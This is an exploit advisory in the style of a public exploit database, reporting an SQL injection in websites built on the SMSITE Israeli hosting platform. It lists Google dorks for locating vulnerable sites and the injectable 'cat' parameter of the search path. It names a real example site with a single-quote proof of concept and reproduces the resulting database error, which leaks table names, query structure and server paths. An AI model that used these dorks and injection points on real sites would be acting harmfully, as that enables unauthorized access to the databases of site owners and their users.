#################################################################################################
# Exploit Title : SMSITEנבנה ע״י SmSite.Co.il Hosting Israel SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 14/09/2018
# Vendor Homepage : smsite.co.il
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
#################################################################################################
# Google Dork :
intext:''SMSITEנבנה ע״י''
intext:''© כל הזכויות שמורות SMSITE''
# Exploit : /search?page=[ID-NUMBER]&cat=[SQL Injection]
#################################################################################################
# Example Site => executive-israel.co.il/search?page=0&cat=1900' => [ Proof of Concept ] => archive.is/7SCBi
# SQL Database Error =>
LINK ERROR: You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near '-20, 20' at line 14
SQL: SELECT `mida_jobs`.`idn`, `mida_jobs`.`name`, `description`, `mida_categories`.
`name` As `cat_name`, `mida_sub_categories`.`name` As `sub_name`, `mida_areas`.`name` As `area_name`
FROM `mida_jobs` LEFT JOIN `mida_categories` ON `mida_jobs`.`category` = `mida_categories`.`idn` LEFT JOIN `mida_sub_categories`
ON `mida_jobs`.`sub_category` = `mida_sub_categories`.`idn` LEFT JOIN `mida_areas` ON `mida_jobs`.`work_area` =
`mida_areas`.`idn` WHERE 1 GROUP BY `mida_jobs`.`idn` ORDER BY `idn` Desc LIMIT -20, 20
Fatal error: Uncaught exception 'Exception' in D:\HostingSpaces\repository\php\db.inc:326 Stack trace: #0
D:\HostingSpaces\repository\php\db.inc(146):
db->failure('SQL ERROR: <br...') #1 D:\HostingSpaces\repository\php\db.inc(186): db->execute('SELECT ?????`mi...') #2
D:\HostingSpaces\repository\php\db.inc(1134): db->query('SELECT ?????`mi...', true, NULL, 1) #3
D:\HostingSpaces\maof1\maof_repository\sections\search\results.inc(130): db->query_object('SELECT ?????`mi...') #4
D:\HostingSpaces\maof1\maof_repository\search.inc(240): require('D:\HostingSpace...') #5
D:\HostingSpaces\maof1\maof_repository\index.inc(33): require('D:\HostingSpace...') #6
D:\HostingSpaces\maof3\executive-israel.co.il\wwwroot\index.php(101): require('D:\HostingSpace...') #7 {main} thrown in
D:\HostingSpaces\repository\php\db.inc on line 326
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################